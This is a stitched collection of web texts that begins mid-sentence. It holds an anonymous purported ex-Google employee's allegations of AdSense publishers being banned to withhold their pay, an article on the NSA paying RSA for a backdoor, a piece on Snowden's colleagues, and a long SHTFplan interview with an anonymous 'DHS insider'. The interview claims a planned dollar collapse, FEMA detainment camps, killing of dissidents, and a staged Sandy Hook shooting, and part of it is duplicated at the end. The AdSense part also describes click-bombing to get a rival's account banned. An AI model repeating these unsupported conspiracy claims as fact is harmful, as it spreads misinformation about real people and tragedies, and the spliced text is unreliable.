people in the AdSense division that furthered the idea and procedure they planned on implementing.
There were lots of rumors and quiet talking amongst the employees, there was lots of speculations,
some came true and some didn’t. But the word was that they were planning to cut off a large portion of
publisher’s payments.
After that point there was a running gag amongst fellow co-workers where we would walk by each other
and whisper “Don’t be evil, pft!” and roll our eyes.
What happened afterwards became much worse. Their “quality control” came into full effect. Managers
pushed for wide scale account bans, and the first big batch of bans happened in March of 2009. The
main reason, the publishers made too much money. But something quite devious happened. We were
told to begin banning accounts that were close to their payout period (which is why account bans never
occur immediately after a payout). The purpose was to get that money owed to publishers back to
Google AdSense, while having already served up the ads to the public.
This way the advertiser’s couldn’t claim we did not do our part in delivering their ads and ask for money
back. So in a sense, we had thousands upon thousands of publishers deliver ads we knew they were
never going to get paid for.
Google reaped both sides of the coin, got money from the advertisers, used the publishers, and didn’t
have to pay them a single penny. We were told to go and look into the publishers accounts, and if any
publisher had accumulated earnings exceeding $5000 and was near a payout or in the process of a
payout, we were to ban the account right away and reverse the earnings back. They kept saying it was
needed for the company, and that most of these publishers were ripping Google off anyways, and that
their gravy train needed to end. Many employees were not happy about this. A few resigned over it.
I did not. I stayed because I had a family to support, and secondly I wanted to see how far they would
go.
From 2009 to 2012 there were many more big batches of bans. The biggest of all the banning sessions
occurred in April of 2012. The AdSense division had enormous pressure from the company to make up
for financial losses, and for Google’s lack of reaching certain internal financial goals for the quarter prior.
So the push was on. The employees felt really uneasy about the whole thing, but we were threatened
with job losses if we didn’t enforce the company’s wishes. Those who voiced concerned or issue were
basically ridiculed with “not having the company’s best interest in mind” and not being “team players”.
Morale in the division was at an all-time low. The mood of the whole place changed quite rapidly. It no
longer was a fun place to work.
The bans of April 2012 came fast and furious. Absolutely none of them were investigated, nor were they
justified in any way. We were told to get rid of as many of the accounts with the largest
checks/payouts/earnings waiting to happen. No reason, just do it, and don’t question it. It was heart
wrenching seeing all that money people had earned all get stolen from them. And that’s what I saw it as,
it was a robbery of the AdSense publishers. Many launched appeals, complaints, but it was futile
because absolutely no one actually took the time to review the appeals or complaints. Most were simply
erased without even being opened, the rest were deposited into the database, never to be touched
again.
Several publishers launched legal actions which were settled, but Google had come up with a new policy
to deal with situations such as that because it was perceived as a serious problem to be avoided.
So they came up with a new policy.
After December 2012: The New Policy
The new policy; “shelter the possible problem makers, and fuck the rest” (those words were actually
said by a Google AdSense exec) when he spoke about the new procedure and policy for “Account
Quality Control”.
The new policy was officially called AdSense Quality Control Color Codes (commonly called AQ3C by
employees). What it basically was a categorization of publisher accounts. Those publisher’s that could
do the most damage by having their account banned were placed in a VIP group that was to be left
alone. The rest of the publishers would be placed into other groupings accordingly.
The new AQ3C also implemented “quality control” quotas for the account auditors, so if you didn’t meet
the “quality control” target (aka account bans) you would be called in for a performance review.
There were four “groups” publishers could fall into if they reached certain milestones.
They were:
Red Group: Urgent Attention Required
Any AdSense account that reaches the $10,000/month mark is immediately flagged (unless they are part
of the Green Group).
– In the beginning there were many in this category, and most were seen as problematic and were seen
as abusing the system by Google. So every effort was taken to bring their numbers down.
– They are placed in what employees termed “The Eagle Eye”, where the “AdSense Eagle Eye Team”
would actively and constantly audit their accounts and look for any absolute reason for a ban. Even if
the reason was far-fetched, or unsubstantiated, and unprovable, the ban would occur. The “Eagle Eye
Team” referred to a group of internal account auditors whose main role was to constantly monitor
publisher’s accounts and sites.
– A reason has to be internally attached to the account ban. The problem was that notifying the
publisher for the reason is not a requirement, even if the publisher asks. The exception: The exact
reason must be provided if a legal representative contacts Google on behalf of the account holder.
– But again, if a ban is to occur, it must occur as close to a payout period as possible with the most
amount of money accrued/earned. Yellow Group: Serious Attention Required
Any AdSense account that reaches the $5,000/month mark is flagged for review (unless they are part of
the Green Group).
– All of the publisher’s site(s)/account will be placed in queue for an audit.
– Most of the time the queue is quite full so most are delayed their audit in a timely fashion.
– The second highest amount of bans occur at this level.
– A reason has to be internally attached to the account ban. Notifiying the publisher for the reason is not
a requirement, even if the publisher asks. The exception: The exact reason must be provided if a legal
representative contacts Google on behalf of the account holder.
– But again, if a ban is to occur, it must occur as close to a payout period as possible with the most
amount of money accrued/earned. Blue Group: Moderate Attention Required
Any AdSense account that reaches the $1,000/month mark is flagged for possible review (unless they
are part of the Green Group).
– Only the main site and account will be place in queue for what is called a quick audit.
– Most bans that occur happen at this level. Main reason is that a reason doesn’t have to be attached to
the ban, so the employees use these bans to fill their monthly quotas. So many are simply a random pick
and click.
– A reason does not have to be internally attached to the account ban. Notifying the publisher for the
reason is not a requirement, even if the publisher asks.
– But again, if a ban is to occur, it must occur as close to a payout period as possible with the most
amount of money accrued. Green Group: VIP Status (what employees refer to as the “untouchables”)
Any AdSense account associated with an incorporated entity or individual that can inflict serious
damage onto Google by negative media information, rallying large amounts of anti-AdSense support, or
cause mass loss of AdSense publisher support.
– Google employees wanting to use AdSense on their websites were automatically placed in the Green
group. So the database contained many Google insiders and their family members. If you work or
worked for Google and were placed in the category, you stayed in it, even if you left Google. So it
included many former employees. Employees simply had to submit a form with site specific details and
their account info.
– Sites in the Green Group were basically given “carte blanche” to do anything they wanted, even if they
flagrantly went against the AdSense TOS and Policies. That is why you will encounter sites with AdSense,
but yet have and do things completely against AdSense rules.
– Extra care is taken not to interrupt or disrupt these accounts.
– If an employee makes a mistake with a Green Level account they can lose their job. Since it seen as
very grievous mistake. New Policy 2012 Part 2:
Internal changes to the policy were constant. They wanted to make it more efficient and streamlined.
They saw its current process as having too much human involvement and oversight. They wanted it
more automated and less involved.
So the other part of the new policy change was to incorporate other Google services into assisting the
“quality control” program. What they came up with will anger many users when they find out. It
involved skewing data in Google Analytics. They decided it was a good idea to alter the statistical data
shown for websites. It first began with just altering data reports for Analytics account holders that also
had an AdSense account, but they ran into too many issues and decided it would be simpler just to skew
the report data across the board to remain consistent and implement features globally.
So what this means is that the statistical data for a website using Google Analytics is not even close to
being accurate. The numbers are incredibly deflated. The reasoning behind their decision is that if an
individual links their AdSense account and their Analytics account, the Analytics account can be used to
deflate the earnings automatically without any human intervention. They discovered that if an individual
had an AdSense account then they were also likely to use Google Analytics. So Google used it to their
advantage.
This led to many publishers to actively display ads, without earning any money at all (even to this day).
Even if their actual website traffic was high, and had high click-throughs the data would be automatically
skewed in favor of Google, and at a total loss of publishers. This successfully made it almost impossible
for anyone to earn amounts even remotely close what individuals with similar sites were earning prior
to 2012, and most definitely nowhere near pre-2009 earnings.
Other policy changes also included how to deal with appeals, which still to this day, the large majority
are completely ignored, and why you will rarely get an actual answer as to why your account was
banned and absolutely no way to resolve it.
—- The BIG Problem (which Google is aware of)
There is an enormous problem that existed for a long time in Google’s AdSense accounts. Many of the
upper management are aware of this problem but do not want to acknowledge or attempt to come up
with a solution to the problem.
It is regarding false clicks on ads. Many accounts get banned for “invalid clicks” on ads. In the past this
was caused by a publisher trying to self inflate click-throughs by clicking on the ads featured on their
website. The servers automatically detect self-clicking with comparison to IP addresses and other such
information, and the persons account would get banned for invalid clicking.
But there was something forming under the surface. A competitor or malicious person would actively go
to their competitor’s website(s) or pick a random website running AdSense and begin multiple-clicking
and overclicking ads, which they would do over and over again. Of course this would trigger an invalid
clicking related ban, mainly because it could not be proven if the publisher was actually behind the
clicking. This was internally referred to as “Click-Bombing”. Many innocent publishers would get caught
up in bans for invalid clicks which they were not involved in and were never told about.
This issue has been in the awareness of Google for a very long time but nothing was done to rectify the
issue and probably never will be. Thus if someone wants to ruin a Google AdSense publishers account,
all you would have to do is go to their website, and start click-bombing their Google Ads over and over
again, it will lead the servers to detect invalid clicks and poof, they get banned. The publisher would be
completely innocent and unaware of the occurrence but be blamed for it anyways.
—-
Their BIG Fear
The biggest fear that Google has about these AdSense procedures and policies is that it will be publicly
discovered by their former publishers who were banned, and that those publishers unite together and
launch an class-action lawsuit.
They also fear those whose primary monthly earnings are from AdSense, because in many countries if a
person claims the monthly amount to their tax agency and they state the monthly amount and that they
are earning money from Google on a monthly basis, in certain nations technically Google can be seen as
an employer. Thus, an employer who withholds payment of earnings, can be heavily fined by
government bodies dealing with labor and employment. And if these government bodies dealing with
labor and employment decide to go after Google, then it would get very ugly, very quickly ….. that is on
top of a class-action lawsuit.
Hmm. Hold up. So if we go by this Wikipedia entry..
“Founded as an independent company in 1982, RSA Security, Inc. was acquired by EMC Corporation in 2006 for US$ 2.1 billion and operates as a division within EMC.[5]”
People need to understand, this means RSA took around 2% of what they’d make in one year. FOR A BACK-DOOR OMG. Does this not sound more like a tax, than a payment (never mind a bribe!)? How much would you care about an extra 2% per year? Exactly. Thats all I got. Someone else needs to close that gap. -Max
What’s an encryption backdoor cost? When you’re the NSA, apparently the fee is $10 million.
Intentional flaws created by the National Security Agency in RSA’s encryption tokens werediscovered in September, thanks to documents released by whistleblower Edward Snowden. It has now been revealed that RSA was paid $10 million by the NSA to implement those backdoors, according to a new report in Reuters.
Two people familiar with RSA’s BSafe software told Reuters that the company had received the money in exchange for making the NSA’s cryptographic formula as the default for encrypted key generation in BSafe.
“Now we know that RSA was bribed,” said security expert Bruce Schneier, who has been involved in the Snowden document analysis. “I sure as hell wouldn’t trust them. And then they made the statement that they put customer security first,” he said.
RSA, now owned by computer storage firm EMC Corp, has a long history of entanglement with the government. In the 1990s, the company was instrumental in stopping a government plan to include a chip in computers that would’ve allowed the government to spy on people.
The new revelation is important, Schneier said, because it confirms more suspected tactics that the NSA employs.
“You think they only bribed one company in the history of their operations? What’s at play here is that we don’t know who’s involved,” he said.
Other companies that build widely-used encryption apparatus include Symantec, McAfee, and Microsoft. “You have no idea who else was bribed, so you don’t know who else you can trust,” Schneier said.
RSA did not return a request for comment, and did not comment for the Reuters story.
Perhaps Edward Snowden’s hoodie should have raised suspicions.
The black sweatshirt sold by the civil libertarian Electronic Frontier Foundation featured a parody of the National Security Agency’s logo, with the traditional key in an eagle’s claws replaced by a collection of AT&T cables, and eavesdropping headphones covering the menacing bird’s ears. Snowden wore it regularly to stay warm in the air-conditioned underground NSA Hawaii Kunia facility known as “the tunnel.”
His coworkers assumed it was meant ironically. And a geek as gifted as Snowden could get away with a few irregularities.
But an NSA staffer who contacted me last month and asked not to be identified–and whose claims we checked with Snowden himself via his ACLU lawyer Ben Wizner—offered me a very different, firsthand portrait of how Snowden was seen by his colleagues in the agency’s Hawaii office: A principled and ultra-competent, if somewhat eccentric employee, and one who earned the access used to pull off his leak by impressing superiors with sheer talent.
The anonymous NSA staffer’s priority in contacting me, in fact, was to refute stories that have surfaced as the NSA and the media attempt to explain how a contractor was able to obtain and leak the tens of thousands of highly classified documents that have become the biggest public disclosure of NSA secrets in history. According to the source, Snowden didn’t dupe coworkers into handing over their passwords, as one report has claimed. Nor did Snowden fabricate SSH keys to gain unauthorized access, he or she says.
Instead, there’s little mystery as to how Snowden gained his access: It was given to him.
“That kid was a genius among geniuses,” says the NSA staffer. “NSA is full of smart people, but anybody who sat in a meeting with Ed will tell you he was in a class of his own…I’ve never seen anything like it.”
When I reached out to the NSA’s public affairs office, a spokesperson declined to comment, citing the agency’s ongoing investigation into Snowden’s leaks.
But over the course of my communications with the NSA staffer, Snowden’s former colleague offered details that shed light on both how Snowden was able to obtain the NSA’s most secret files, as well as the elusive 30-year old’s character:
Before coming to NSA Hawaii, Snowden had impressed NSA officials by developing a backup system that the NSA had widely implemented in its codebreaking operations.
He also frequently reported security vulnerabilities in NSA software. Many of the bugs were never patched.
Snowden had been brought to Hawaii as a cybersecurity expert working for Dell’s services division but due to a problem with the contract was reassigned to become an administrator for the Microsoft intranet management system known as Sharepoint. Impressed with his technical abilities, Snowden’s managers decided that he was the most qualified candidate to build a new web front-end for one of its projects, despite his contractor status. As his coworker tells it, he was given full administrator privileges, with virtually unlimited access to NSA data. “Big mistake in hindsight,” says Snowden’s former colleague. “But if you had a guy who could do things nobody else could, and the only problem was that his badge was green instead of blue, what would you do?”
As further evidence that Snowden didn’t hijack his colleagues’ accounts for his leak, the NSA staffer points to an occasion when Snowden was given a manager’s password so that he could cover for him while he was on vacation. Even then, investigators found no evidence Snowden had misused that staffer’s privileges, and the source says nothing he could have uniquely accessed from the account has shown up in news reports.
Snowden’s superiors were so impressed with his skills that he was at one point offered a position on the elite team of NSA hackers known as Tailored Access Operations. He unexpectedly turned it down and instead joined Booz Allen to work at NSA’s Threat Operation Center.
Another hint of his whistleblower conscience, aside from the telltale hoodie: Snowden kept a copy of the constitution on his desk to cite when arguing against NSA activities he thought might violate it.
The source tells me Snowden also once nearly lost his job standing up for a coworker who was being disciplined by a superior.
Snowden often left small, gifts anonymously at colleagues’ desks.
Snowden’s former colleague says that he or she has slowly come to understand Snowden’s decision to leak the NSA’s files. “I was shocked and betrayed when I first learned the news, but as more time passes I’m inclined to believe he really is trying to do the right thing and it’s not out of character for him. I don’t agree with his methods, but I understand why he did it,” he or she says. “I won’t call him a hero, but he’s sure as hell no traitor.”
SHTFplan Editor’s Note: The following interview is both informative and terrifying, and essential reading for anyone concerned about what comes next.
What the DHS Insider suggests is about to happen is exactly what many of us fear – a police state takeover of America, with urban centers to be pacified first, all outspoken critics of the government to be silenced, and travel restrictions across the United States to come shortly thereafter.
The dollar collapse, riots, the mobilization of domestic law enforcement, gun control, rationing of food and gas, suspension of the U.S. Constitution and a complete lock-down of America as we know it. According to the report, sinister forces within the U.S. government operating at the highest levels of our country’s political, financial, intelligence and military hierarchies have set into motion a series of events that will leave the populace so desperate for government intervention that they’ll willingly surrender their liberty for the perceived security of a militarized police state.
Interviewer Doug Hagmann cites an anonymous source operating deep inside the Department of Homeland Security, which may leave many skeptical of the accuracy of the reports. But the fact is, were such events being planned behind the scenes we certainly wouldn’t be given official mainstream warning. If real, the report is a game changer, and it makes sense that anyone privy to such information would want to keep their identity hidden. Whistle blowers in America who expose the corruption of officials in our government are treated not as patriots, but as traitors, and are often branded as psychos or terrorists.
What’s most alarming is the speed at which these events may play out.
23 December 2012: After a lengthy, self-imposed informational black-out, my high-level DHS contact known as “Rosebud” emerged with new, non-public information about plans being discussed and prepared for implementation by the Department of Homeland Security (DHS) in the near future. It is important to note that this black-out was directly related to the aggressive federal initiative of identifying and prosecuting “leakers,” at least those leaks and leakers not sanctioned by the executive office – the latter of which there are many.
Due to those circumstances, my source exercised an abundance of caution to avoid compromising a valuable line of communication until he had information he felt was significant enough to risk external contact. The following information is the result of an in-person contact between this author and “Rosebud” within the last 48 hours. With his permission, the interview was digitally recorded and the relevant portions of the contact are provided in a conversational format for easier reading. The original recording was copied onto multiple discs and are maintained in secure locations for historical and insurance purposes.
Meeting
The following began after an exchange of pleasantries and other unrelated discussion:
DH: Do I have your permission to record this conversation?
RB: You do.
DH: I’ve received a lot of e-mail from people wondering where you went and why you’ve been so quiet.
RB: As I told you earlier, things are very dicey. Weird things began to happen before the election and have continued since. Odd things, a clampdown of sorts. I started looking and I found [REDACTED AT THE REQUEST OF THIS SOURCE], and that shook me up. I’m not the only one, though, that found a [REDACTED], so this means there’s surveillance of people within DHS by DHS. So, that explains this cloak and dagger stuff for this meeting.
DH: I understand. What about the others?
RB: They are handling it the same way.
DH: I’ve received many e-mails asking if you are the same person giving information to Ulsterman. Are you?
RB: No, but I think I know at least one of his insiders.
DH: Care to elaborate?
RB: Sorry, no.
DH: Do you trust him or her. I mean, the Ulsterman source?
RB: Yes.
DH: Okay, so last August, you said things were “going hot.” I printed what you said, and things did not seem to happen as you said.
RB: You’d better recheck your notes and compare [them] with some of the events leading up to the election. I think you’ll find that a full blown campaign of deception took place to make certain Obama got back into office. The polls, the media, and a few incidents that happened in the two months before the election. I guess if people are looking for some big event they can point to and say “aha” for verification, well then I overestimated people’s ability to tell when they are being lied to.
DH: What specific incidents are you referring to?
RB: Look at the threats to Obama. Start there. The accusations of racism. Then look at the polls, and especially the judicial decisions about voter ID laws. Bought and paid for, or where there was any potential for problems, the judges got the message, loud and clear. Then look at the voter fraud. And not a peep from the Republicans. Nothing. His second term was a done deal in September. This was planned. Frankly, the Obama team knew they had it sewn up long before election day. Benghazi could have derailed them, but the fix was in there, so I never saw anything on my end to suggest a ready-made solution had to be implemented.
DH: What’s going on now?
RB: People better pay close attention over the next few months. First, there won’t be any meaningful deal about the fiscal crisis. This is planned, I mean, the lack of deal is planned. In fact, it’ necessary to pave the way for what is in the short term agenda.
DH: Wait, you’re DHS – not some Wall Street insider.
RB: So you think they are separate agendas? That’s funny. The coming collapse of the U.S. dollar is a done deal. It’s been in the works for years – decades, and this is one of the most important cataclysmic events that DHS is preparing for. I almost think that DHS was created for that purpose alone, to fight Americans, not protect them, right here in America. But that’s not the only reason. There’s the gun issue too.
DH: So, what are you seeing at DHS?
RB: We don’t have a lot of time, tonight – our meeting – as well as a country. I mean I have heard – with my own ears – plans being made that originate from the White House that involve the hierarchy of DHS. You gotta know how DHS works at the highest of levels. It’s Jarrett and Napolitano, with Jarrett organizing all of the plans and approaches. She’s the one in charge, at least from my point of view, from what I am seeing. Obama knows that’s going on and has say, but it seems that Jarrett has the final say, not the other way around. It’s [screwed] up. This really went into high gear since the election.
But it’s a train wreck at mid management, but is more effective at the lower levels. A lot of police departments are being gifted with federal funds with strings attached. That money is flowing out to municipal police departments faster than it can be counted. They are using this money to buy tanks, well, not real tanks, but you know what I mean. DHS is turning the police into soldiers.
By the way, there has been a lot of communication recently between Napolitano and Pistole [TSA head]. They are planning to use TSA agents in tandem with local police for certain operations that are being planned right now. This is so [deleted] important that you cannot even begin to imagine. If you get nothing else out of this, please, please make sure you tell people to watch the TSA and their increasing involvement against the American public. They are the stooges who will be the ones to carry out certain plans when the dollar collapses and the gun confiscation begins.
DH: Whoa, wait a minute. You just said a mouthful. What’s the agenda here?
RB: Your intelligence insider – he knows that we are facing a planned economic collapse. You wrote about this in your articles about Benghazi, or at least that’s what I got out of the later articles. So why the surprise?
DH: There’s a lot here. Let’s take it step by step if you don’t mind.
RB: Okay, but I’m not going to give it to you in baby steps. Big boy steps. This is what I am hearing. Life for the average American is going to change significantly, and not the change people expect. First, DHS is preparing to work with police departments and the TSA to respond to civil uprisings that will happen when there is a financial panic. And there will be one, maybe as early as this spring, when the dollar won’t get you a gumball. I’m not sure what the catalyst will be, but I’ve heard rumblings about a derivatives crisis as well as an oil embargo. I don’t know, that’s not my department. But something is going to happen to collapse the dollar, which has been in the works since the 1990′s. Now if it does not happen as soon as this, it’s because there are people, real patriots, who are working to prevent this, so it’s a fluid dynamic. But that doesn’t change the preparations.
And the preparations are these: DHS is prepositioning assets in strategic areas near urban centers all across the country. Storage depots. Armories. And even detainment facilities, known as FEMA camps. FEMA does not even know that the facilities are earmarked for detainment by executive orders, at least not in the traditional sense they were intended. By the way, people drive by some of these armories everyday without even giving them a second look. Commercial and business real estate across the country are being bought up or leased for storage purposes. Very low profile.
Anyway, I am hearing that the plan from on high is to let the chaos play out for a while, making ordinary citizens beg for troops to be deployed to restore order. but it’s all organized to make them appear as good guys. That’s when the real head knocking will take place. We’re talking travel restrictions, which should no be a problem because gas will be rationed or unavailable. The TSA will be in charge of travel, or at least be a big part of it. They will be commissioned, upgraded from their current status.
They, I mean Jarrett and Obama as well as a few others in government, are working to create a perfect storm too. This is being timed to coincide with new gun laws.
DH: New federal gun laws?
RB: Yes. Count on the criminalization to possess just about every gun you can think of. Not only restrictions, but actual criminalization of possessing a banned firearm. I heard this directly from the highest of my sources. Plans were made in the 90′s but were withheld. Now, it’s a new day, a new time, and they are riding the wave of emotion from Sandy Hook., which, by the way and as tragic as it was, well, it stinks to high heaven. I mean there are many things wrong there, and first reports are fast disappearing. The narrative is being changed. Look, there is something wrong with Sandy Hook, but if you write it, you’ll be called a kook or worse.
DH: Sure
RB: But Sandy Hook, there’s something very wrong there. But I am hearing that won’t be the final straw. There will be another if they think it’s necessary.
DH: Another shooting?
RB: Yes.
DH: That would mean they are at least complicit.
RB: Well, that’s one way of looking at it.
DH: Are they? Were they?
RB: Do your own research. Nothing I say, short of bringing you photographs and documents will convince anyone, and even then, it’s like [DELETED] in the wind.
DH: So…
RB: So what I’m telling you is that DHS, the TSA and certain, but not all, law enforcement agencies are going to be elbow deep in riot control in response to an economic incident. At the same time or close to it, gun confiscation will start. It will start on a voluntary basis using federal registration forms, then an amnesty, then the kicking-in of doors start.
Before or at the same time, you know all the talk of lists, you know, the red and blue lists that everyone made fun of? Well they exist, although I don’t know about their colors. But there are lists of political dissidents maintained by DHS. Names are coordinated with the executive branch, but you know what? They did not start with Obama. They’ve been around in one form or another for years. The difference though is that today, they are much more organized. And I’ll tell you that the vocal opponents of the politics of the global elite, the bankers, and the opponents of anything standing in their way, well, they are on the top of the list of people to be handled.
DH: Handled?
RB: As the situations worsen, some might be given a chance to stop their vocal opposition. Some will, others won’t. I suppose they are on different lists. Others won’t have that chance. By that time, though, it will be chaos and people will be in full defensive mode. They will be hungry, real hunger like we’ve never experienced before. They will use our hunger as leverage. They will use medical care as leverage.
DH: Will this happen all at once?
RB: They hope to make it happen at the same time. Big cities first, with sections being set apart from the rest of the country. Then the rural areas. There are two different plans for geographical considerations. But it will all come together.
DH: Wait, this sounds way, way over the top. Are you telling me… [Interrupts]
RB: [Over talk/Unintelligible] …know who was selected or elected twice now. You know who his associates are. And you are saying this is way over the top? Don’t forget what Ayers said – you talked to Larry Grathwohl. This guy is a revolutionary. He does not want to transform our country in the traditional sense. He will destroy it. And he’s not working alone. He’s not working for himself, either. He has his handlers. So don’t think this is going to be a walk in the park, with some type of attempt to rescue the country. Cloward-Piven. Alinsky. Marx. All rolled into one. And he won’t need the rest of his four years to do it.
DH: I need you to be clear. Let’s go back again, I mean, to those who speak out about what’s happening.
RB: [Edit note: Obviously irritated] How much clearer do you want it? The Second Amendment will be gone, along with the first, at least practically or operationally. The Constitution will be gone, suspended, at least in an operational sense. Maybe they won’t actually say that they are suspending it, but will do it. Like saying the sky is purple when it’s actually blue. How many people will look a the sky and say yeah, it’s purple? They see what they want to see.
So the DHS, working with other law enforcement organizations, especially the TSA as it stands right now, will oversee the confiscation of assault weapons, which includes all semi-automatic weapons following a period of so-called amnesty. It also includes shotguns that hold multiple rounds, or have pistol grips. They will go after the high capacity magazines, anything over, say 5 rounds.
They will also go after the ammunition, especially at the manufacturer’s level. They will require a special license for certain weapons, and make it impossible to own anything. More draconian than England. This is a global thing too. Want to hunt? What gives you the right to hunt theiranimals? Sound strange? I hope so, but they believe they own the animals. Do you understand now, how sick and twisted this is? Their mentality?
The obvious intent is to disarm American citizens. They will say that we’ll still be able to defend ourselves and go hunting, but even that will be severely regulated. This is the part that they are still working out, though. While the plans were made years ago, there is some argument over the exact details. I know that Napalitano, even with her support of the agenda, would like to see this take place outside of an E.O. [Executive Order] in favor of legislative action and even with UN involvement.
DH: But UN involvement would still require legislative approval.
RB: Yes, but your still thinking normal – in normal terms. Stop thinking about a normal situation. The country is divided, which is exactly where Obama wants us to be. We are as ideologically divided as we were during the Civil War and that rift is growing every day. Add in a crisis – and economic crisis – where ATM and EBT cards will stop working. Where bank accounts will contain nothing but air. They are anticipating a revolution and a civil war rolled into one (emphasis added by this author).
Imagine when talk show hosts or Bloggers or some other malcontent gets on the air or starts writing about the injustice of it all, and about how Obama is the anti-Christ or something. They will outlaw such talk or writing as inciting the situation – they will make it illegal by saying that it is causing people to die. The Republicans will go along with everything as it’s – we have – a one party system. Two parties is an illusion. It’s all so surreal to talk about but you see where this is headed, right?
DH: Well, what about the lists?
RB: Back to that again, okay. Why do you think the NSA has surveillance of all communications? To identify and stop terrorism? Okay, to be fair, that is part of it, but not the main reason. The federal agencies have identified people who present a danger to them and their agendas. I don’t know if they are color coded like you mentioned, red blue purple or peach mango or whatever, but they exist. In fact, each agency has their own. You know, why is it so [deleted] hard for people to get their heads around the existence of lists with names of people who pose a threat to their plans? The media made a big deal about Nixon’s enemies list and everyone nodded and said yeah, that [deleted], but today? They’ve been around for years and years.
DH: I think it’s because of the nature of the lists today. What do they plan to do with their enemies?
RB: Go back to what Ayers said when, in the late 60′s? 70′s? I forget. Anyway, he was serious. But to some extent, the same thing that happened before. They – the people on some of these lists – are under surveillance, or at least some, and when necessary, some are approached and made an offer. Others, well, they can be made to undergo certain training. Let’s call it sensitivity training, except on a much different level. Others, most that are the most visible and mainstream are safe for the most part. And do you want to know why? It’s because they are in the pockets of the very people we are talking about, but they might or might not know it. Corporate sponsorship – follow the money. You know the drill. You saw it happen before, with the birth certificate.
It’s people that are just under the national radar but are effective. They have to worry. Those who have been publicly marginalized already but continue to talk or write or post, they are in trouble. It’s people who won’t sell out, who think that they can make a difference. Those are the people who have to worry.
Think about recent deaths that everybody believes were natural or suicides. Were they? People are too busy working their [butts] off to put food on the table to give a damn about some guy somewhere who vapor locks because of too many doughnuts and coffee and late nights. And it seems plausible enough to happen. This time, when everything collapses, do you think they will care if it is a bullet or a heart attack that takes out the opposition? [Deleted] no.
DH: That’s disturbing. Do you… [interrupts]
RB: Think about the Oklahoma City bombing in ’95. Remember how Clinton blamed that on talk radio, or at least in part. Take what happened then and put it in context of today. Then multiply the damnation by 100, and you will begin to understand where this is going. People like Rush and Hannity have a narrow focus of political theater. They’ll still be up and running during all of this to allow for the appearance of normal. Stay within the script, comrade.
But as far as the others, they have certain plans. And these plans are becoming more transparent. They are getting bolder. They are pushing lies, and the bigger the lie, the easier it is to sell to the people. They will even try to sell a sense of normalcy as things go absolutely crazy and break down. It will be surreal. And some will believe it, think that it’s only happening in certain places, and we can draw everything back once the dust settles. But when it does, this place will not be the same.
DH: Will there be resistance within the ranks of law enforcement? You know, will some say they won’t go along with the plan, like the Oath Keepers?
RB: Absolutely. But they will not only be outnumbered, but outgunned – literally. The whole objective is to bring in outside forces to deal with the civil unrest that will happen in America. And where does their allegiance lie? Certainly not to Sheriff Bob. Or you or me.
During all of this, and you’ve got to remember that the dollar collapse is a big part of this, our country is going to have to be redone. I’ve seen – personally – a map of North America without borders. Done this year. The number 2015 was written across the top, and I believe that was meant as a year. Along with this map – in the same area where this was – was another map showing the United States cut up into sectors. I’m not talking about what people have seen on the internet, but something entirely different. Zones. And a big star on the city of Denver.
Sound like conspiracy stuff on the Internet? Yup. But maybe they were right. It sure looks that way. It will read that way if you decide to write about this. Good luck with that. Anyway, the country seemed to be split into sectors, but not the kind shown on the internet. Different.
DH: What is the context of that?
RB: Across the bottom of this was written economic sectors. It looked like a work in progress, so I can’t tell you any more than that. From the context I think it has to do with the collapse of the dollar.
DH: Why would DHS have this? I mean, it seems almost contrived, doesn’t it?
RB: Not really, when you consider the bigger picture. But wait before we go off into that part. I need to tell you about Obamacare, you know, the new health care coming up. It plays a big part – a huge [deleted] part in the immediate reshaping of things.
DH: How so?
RB: It creates a mechanism of centralized control over people. That’s the intent of this monster of a bill, not affordable health care. And it will be used to identify gun owners. Think your health records are private? Have you been to the doctor lately? Asked about owning a gun? Why do you think they ask, do you think they care about your safety? Say yes to owning a gun and your information is shared with another agency, and ultimately, you will be identified as a security risk. The records will be matched with other agencies.
You think that they are simply relying on gun registration forms? This is part of data collection that people don’t get. Oh, and don’t even think about getting a script for some mood enhancement drug and being able to own a gun.
Ayers and Dohrn are having the times of their lives seeing things they’ve worked for all of their adult lives actually coming to pass. Oh, before I forget, look at the recent White House visitor logs.
DH: Why? Where did that come from?
RB: Unless they are redacted, you will see the influence of Ayers. Right now. The Weather Underground has been reborn. So has their agenda.
DH: Eugenics? Population control?
RB: Yup. And re-education camps. But trust me, you write about this, you’ll be called a kook. It’s up to you, it’s your reputation, not mine. And speaking about that, you do know that this crew is using the internet to ruin people, right? They are paying people to infiltrate discussion sites and forums to call people like you idiots. Show me the proof they say. Why doesn’t you source come forward? If he knows so much, why not go to Fox or the media? To them, if it’s not broadcast on CNN, it’s not real. Well, they’ve got it backwards. Very little on the news is real. The stock market, the economy, the last presidential polls, very little is real.
But this crew is really internet savvy. They’ve got a lot of people they pay to divert issues on forums, to mock people, to marginalize them. They know what they’re doing. People think they’ll take sites down – hack them. Why do that when they are more effective to infiltrate the discussion? Think about the birth certificate, I mean the eligibility problem of Obama. Perfect example.
DH: How soon do you see things taking place?
RB: They already are in motion. If you’re looking for a date I can’t tell you. Remember, the objectives are the same, but plans, well, they adapt. They exploit. Watch how this fiscal cliff thing plays out. This is the run-up to the next beg economic event.
I can’t give you a date. I can tell you to watch things this spring. Start with the inauguration and go from there. Watch the metals, when they dip. It will be a good indication that things are about to happen. I got that little tidbit from my friend at [REDACTED].
NOTE: At this point, my contact asked me to reserve further disclosures until after the inauguration.
Douglas J. Hagmann and his son, Joe Hagmann host The Hagmann & Hagmann Report, a live Internet radio program broadcast each weeknight from 8:00-10:00 p.m. ET.
Douglas Hagmann, founder & director of the Northeast Intelligence Network, and a multi-state licensed private investigative agency. Doug began using his investigative skills and training to fight terrorism and increase public awareness through his website.
DH: Wait, this sounds way, way over the top. Are you telling me… [Interrupts]
RB: [Over talk/Unintelligible] …know who was selected or elected twice now. You know who his associates are. And you are saying this is way over the top? Don’t forget what Ayers said – you talked to Larry Grathwohl. This guy is a revolutionary. He does not want to transform our country in the traditional sense. He will destroy it. And he’s not working alone. He’s not working for himself, either. He has his handlers. So don’t think this is going to be a walk in the park, with some type of attempt to rescue the country. Cloward-Piven. Alinsky. Marx. All rolled into one. And he won’t need the rest of his four years to do it.
DH: I need you to be clear. Let’s go back again, I mean, to those who speak out about what’s happening.
RB: [Edit note: Obviously irritated] How much clearer do you want it? The Second Amendment will be gone, along with the first, at least practically or operationally. The Constitution will be gone, suspended, at least in an operational sense. Maybe they won’t actually say that they are suspending it, but will do it. Like saying the sky is purple when it’s actually blue. How many people will look a the sky and say yeah, it’s purple? They see what they want to see.
